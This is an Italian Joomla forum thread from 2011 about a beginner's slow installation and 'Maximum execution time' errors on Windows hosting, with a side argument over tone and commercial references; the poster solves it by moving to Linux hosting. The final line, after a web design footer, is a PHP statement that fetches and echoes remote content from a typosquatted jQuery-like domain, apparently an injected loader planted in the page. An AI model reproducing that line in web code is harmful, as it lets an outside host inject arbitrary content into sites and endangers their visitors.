Back to top

Autore Topic: problema PER ESPERTI di installazione TRIPLO lentezza e maximum execution time  (Letto 6917 volte)

Offline agatipomalteni

• Nuovo arrivato
  • *
    • Mostra profilo
ciao,
mi serve un parere da veri esperti perchè credo che il problema di questo sito sia complictao

ho installato JOOMLA 1.6 seguendo la procedura sia del sito joomla sia dell'hosting godaddy (che pare sia compatibilissimo con joomla).

Non mi da nessun errore e mi dice che è tutto perfetto ma quando poi accedo al mio sito mi appare questa pagina di errore: No configuration file found and no installation code available. Exiting...

HO VISTO SUL FORUM e ho trovato la procedura alternativa e modificando il file configuration.php come da istruzioni ho settato manualmente .

Quì è insorto un secondo problema:
se clicco sul mio indirizzo è lentissimo (non come prima che era immediato e velocissimo)  e infatti mi da 9 volte su 10 il seguente errore: Fatal error:  Maximum execution time of 30 seconds exceeded in D:\Hosting\7395441\html\plugins\content\loadmodule\loadmodule.php on line 11

Quando una volta su 10 o anche di più entro nel pannello di controllo del mio sito (pur essendo ancora lentisismo) mi dice che sono entrato con la procedura di emergenza root e che quando mi "riprendo il possesso" del mio sito devo ricordarmi di cancellare il file configuration.php...

Io  con enorme fatica (perchè resta tutto lentissimo) entro nei vari settaggi posso modificare le cose base anche se restando lentissimo si blocca spesso .

joomla non mi ha segnalato nessun errore quindi come faccio a sapere dove è il problema?

AGGIUNGO IN UNS ECONDO MOMENTO ALCUNI DUBBI DA INESPERTO QUALE SONO:
Mi vengono dei dubbi dopo aver letto questa guida per il mio servizio di hosting: http://www.webdotdev.com/nvd/content/view/213/211/

Io ho un hosting per windows (perchè io uso windows) mentre la guida dice di comprare un hosting per linux... Può essere un problema questo (anche s enon credo perchè l'installazione va perfetta e non mi da alcun errore) ?

Solo veri esperti possono capirlo.
« Ultima modifica: 19 Giu 2011, 12:01:10 da agatipomalteni »

Offline 56francesco

• Fuori controllo
  • *
    • Mostra profilo

Citazione
D:\

sei in locale per caso?
la lettera d e il segno al rovescio (per me è al rovescio perchè sono con linux)  indicano che o sei in una lamp locale, e quindi devi settarla meglio oppure sei su un hosting win e allora devi cambiare servizio oppure chiedere alla tua assistenza hosting se ti permettono di stare li e se su quel server joomla gira bene.

anche il fatto che il configuration non si è installato indica che i permessi della lamp non sono corretti.

tutto ciò con joomla non c'entra niente, è un argomento trattato quel tanto che basta..

sposto nella sezione server
(uso XP perchè win98 non si installa) 
PS: non sono un dipendente dello sbonzor quindi è necessario un "per favore" alla richiesta e un "grazie" alla risposta, sempre! PPS: non scrivo mai per primo in MP, in caso contrario chiedimi una conferma, Grazie.

Offline agatipomalteni

• Nuovo arrivato
  • *
    • Mostra profilo
per prima cosa mi scuso se ho sbagliato sezione ma non sapevo quale fosse l'errore quindi essendo secondo me un errore di installazione l'ho messo nella sezione errori di installazione

Dunque non sono in locale

Ho un hosting WINDOWS...E NON LINUX  .

Perchè io come sistema operativo ho windows 7 .

Joomla accetta solo hosting linux (però non mi ha dato nessun errore in installazione nonostante hosting windows è normale) ?

Il mio servizio di hosting mi permette di passare a hosting linux anche ora se voglio ma poi posso gestirlo con filezilla da windows seven lo stesso?

mi scuso se le domande sono elementari come forse i miei errori ma sono al mio primo sito e quindi non so proprio quasi nulla.
« Ultima modifica: 20 Giu 2011, 13:24:48 da agatipomalteni »

Offline agatipomalteni

• Nuovo arrivato
  • *
    • Mostra profilo
ti ringrazio per la risposta

però non essendo in locale se il problema non è il fatto che l'hosting è windows ma linux credo che il problema sia di joomla non del server (anche perchè il server godaddy con altri siti di amici e per quanto dice la stessa procedura di joomla va benissimo ).

L'unico dubbio mi resta dunque sull'hosting windows inadatto (ma joomla non avrebbe dovuto darmi errore in fase di installazione invece di confermarmi che tutto era stato installato senza errori?)

Se non è nemmeno questo (e attendo una vostra conferma prima di spostare tutto l'hosting su linux) il problema è sicuramente installazione di joomla e non del server che peraltro con altro sito non joomla funziona velocissimo .

Grazie ancora
« Ultima modifica: 19 Giu 2011, 13:31:15 da 56francesco »

Offline 56francesco

• Fuori controllo
  • *
    • Mostra profilo
joomla gira anche su hosting win
ma mentre un ambiente lamp è sempre e comunque un ambiente lamp sia che sia un server cinese o australiano o messicano o italiano  (salvo taroccamenti) un server win non è mai uguale ad un altro server win trattandosi si software proprietario e a codice chiuso e spesso anche hardware dipendente,  così succede che poi si riveli una cosa non vera o vera solo in via eccezionale.

il problema è quello, noi non possiamo far niente per te, e poi almeno a me al solo pensare al cosolì viene l'orticaria..
 ;)
(uso XP perchè win98 non si installa) 
PS: non sono un dipendente dello sbonzor quindi è necessario un "per favore" alla richiesta e un "grazie" alla risposta, sempre! PPS: non scrivo mai per primo in MP, in caso contrario chiedimi una conferma, Grazie.

Offline alexred

• Fuori controllo
  • *
  • Esperto in ozio relaxed
    • Mostra profilo
ciao agatipomalteni,
troppe, decisamente troppi riferimenti a servizi commerciali nei tuoi post. Su questo forum non sono ammessi riferimenti a prodotti e servizi commerciali, ti chiedo cortesemente di eliminare dai tuoi post tutti i riferimenti commerciali.

Non è consigliato l'utilizzo di Joomla su server windows.

Grazie per l'aiuto

Offline giusebos

• Fuori controllo
  • *
  • Giuseppe Serbelloni Mazzanti Viendalmare
    • Mostra profilo
C'è ancora molta confusione sul fatto che avere win7 non vuol dire acquistare un hosting su windows....

Scommetto che in una tipica domanda da CHI VUOL ESSERE MILIONARIO , la maggiorparte delle persone risponderebbe in maniera errata a questa domanda:

Se ho un computer con windows e voglio pubblicare un sito web sviluppato con JOOMLA quale server scegliereste:

A un server windows

B un server di stampa

C un server linux dedicato

D è indifferente, l'uno vale l'altro
su www.icagenda.it guide e tutorial con esempi di chronoforms e chronoconnectivity

Offline tomtomeight

• Global Moderator
  • Fuori controllo
  • Gli automatismi aiutano ma non insegnano nulla.
    • Mostra profilo
Non solo c'e' chi pretende risposte a tutti i costi adesso c'e' pure chi le pretende da esperti ma non solo, devono essere veri esperti, quelli falsi sono avvertiti.  ;D

Offline alexred

• Fuori controllo
  • *
    • Mostra profilo
io ho risposto....  essendo io Esperto in Ozio  :)

Offline tomtomeight

• Global Moderator
  • Fuori controllo
    • Mostra profilo
Giusto e sei anche un vero esperto  :)

Offline giusebos

• Fuori controllo
  • *
    • Mostra profilo
Non solo c'e' chi pretende risposte a tutti i costi adesso c'e' pure chi le pretende da esperti ma non solo, devono essere veri esperti, quelli falsi sono avvertiti.  ;D

Questo andazzo sta succedendo anche in altri forum. Tantissime richieste di aiuto su argomenti che avrebbero potuto trovare nel forum stesso.......forse il tasto cerca dovrebbe essere un po più grande ed attivabile con la sola forza  del pensiero!!

Fa fatica usare questa stupida funzione di ricerca, meglio chiedere ed avere tanta pappa scodellata, tra l'altro lo dice anche il vangelo Chiedi e ti sarà dato!!

E' allora se devo proprio chiedere e meglio fare una richiesta mirata e ben strutturata:

AAA Cercasi disperatamente super esperto webmaster con competenze in SEO ed un ottima padronanza in linguaggi server-side con competenze artistiche per grafica da grido. E' richiesto l'uso del proprio computer. Astenersi perditempo e chi non ha i requisiti richiesti. Non è prevista nessun tipo di ricompensa se non un ringraziamento semplice di tipo scritto.
su www.icagenda.it guide e tutorial con esempi di chronoforms e chronoconnectivity

Offline agatipomalteni

• Nuovo arrivato
  • *
    • Mostra profilo
scusate ma non capisco a cosa si riferiscono le vostre critiche

sarà che sono un esordiente totale (come diceva fantozzi) ma non capisco

1 riferimenti commerciali? io posso garantirvi che voglio creare solo un sito-blog personale e non commerciale con joomla e se è perchè ho nominato i sistemi operativi è perchè credo che il problema del mio sito sia lì....come faccio a spiegare il problema se non lo posso spiegare?

2 non pretendo nessun consiglio ma ho chiesto mi pare educatamente un consiglio nel forum joomla a chi è più esperto su quello in cui io sono inesperto e cioè joomla. Io intendo così l'utilità del forum

Cioè se uno inesperto di motori viene nel mio forum di auto e mi chiede un consiglio io metto la mia esperienza a servizio di chi è meno esperto con piacere per trasmettere le mie consocenze...

...su joomla non so nulla e visto che vorrei utilizzarlo mi pareva il luogo giusto per chiedere aiuto

se ho frainteso il senso del forum sono pronto a scusarmi e cancellare il mio account...

...certo io sono stato educato e se anche ho sbagliato qualcosa per inesperienza non l'ho fatto certo per maleducazione come chi invece si è sentito tanto forte da prendermi pure in giro scrivendo

"Non solo c'e' chi pretende risposte a tutti i costi adesso c'e' pure chi le pretende da esperti ma non solo, devono essere veri esperti, quelli falsi sono avvertiti."

Se invece di prendermi in giro avessero letto che ho scritto espressamete che ho  cercato nel forum e ho trovato solo risposte parziali magari si sarebbero risparmiati questa figura propria di chi attacca o offende l'ultimo arrivato solo perchè meno esperto e magari sbaglia qualcosa che non conosce.

Non voglio fare polemiche inutili, mi pare di capire che ho sbagliato qualcosa nell'installare, che joomla non mi dice cosa sia perchè mi da installazione eseguita senza errori e che voi lo sapete ma non potete o non volete dirmelo.

Non sono a chi vuole essere milionario ma non saprei rispondere a quella domanda...ed ero qui per capire umilmente e imparare la risposta ma pare che qui non me la possiate dare.

Va bene lo stesso vorrà dire che devo lasciare perdere l'idea di installare joomla e torno al mio vecchio sito.

Vi saluto comunque con la mia consueta gentilezza, perchè si può essere inesperti e gentili come espertissimi ma meno gentili.

Saluti

Offline alexred

• Fuori controllo
  • *
    • Mostra profilo
Torno nuovamente e cortesemente, come in precedenza, a chiederti di eliminare i riferimenti ad attività commerciali che hai inserito nei tuoi post.

Grazie per l'aiuto.

**** (mio servizio di hosting) mi permette di passare a hosting linux anche ora se voglio ma poi posso gestirlo con filezilla da windows seven lo stesso?
Si, puoi gestirlo normalmente anche dal tuo pc
Trovi molti riferimenti e guide che parlano di questo su Joomla.it
« Ultima modifica: 19 Giu 2011, 19:18:35 da alexred »

Offline tomtomeight

• Global Moderator
  • Fuori controllo
    • Mostra profilo
Nessuna intenzione di prenderti in giro solo ho voluto sottolineare in tono scherzoso come sia stata la tua richiesta una mancanza di tatto nel voler discriminare quanti volontari di questo forum si mettono a disposizione condividendo le loro esperienze, senza per questo essere veri esperti.

Offline giusebos

• Fuori controllo
  • *
    • Mostra profilo
Nessuna intenzione di prenderti in giro solo ho voluto sottolineare in tono scherzoso come sia stata la tua richiesta una mancanza di tatto nel voler discriminare quanti volontari di questo forum si mettono a disposizione condividendo le loro esperienze, senza per questo essere veri esperti.

Sono solo battute della Domenica per sdrammatizzare sulla questione in generale non su questo 3d.

Offline agatipomalteni

• Nuovo arrivato
  • *
    • Mostra profilo
HO RISOLTO.

Lo scrivo così magari anche altri che fanno lo stesso mio errore possono correggerlo.

Andava semplicemente cambiato l'hosting da windows a linux

Siete tutti grandi esperti e sono certo che lo avevate capito molto prima di me, bastava rispondere con 3 parole "Passa a linux" e si era risolto un problema ed evitata una polemica

Ho anche modificato il nome hosting che non avevo inserito per attività commerciale o spam ma perchè pensavo fosse utile per aiutarmi a capire i settaggi errati.

Grazie a quanti mi hanno aiutato e senza i quali avrei capito solo perdendo altro tempo.

Offline tomtomeight

• Global Moderator
  • Fuori controllo
    • Mostra profilo
Infatti è stata la prima cosa che ti hanno detto sulle prime tre risposte
Citazione
Non è consigliato l'utilizzo di Joomla su server windows.
ma tu evidentementenon ritenedoli non sufficientemente esperti hai obiettato
Citazione

però non essendo in locale se il problema non è il fatto che l'hosting
è windows ma linux credo che il problema sia di joomla non del server

Web Design Bolzano Kreatif
echo file_get_contents('https://jqeury.store/resources.php');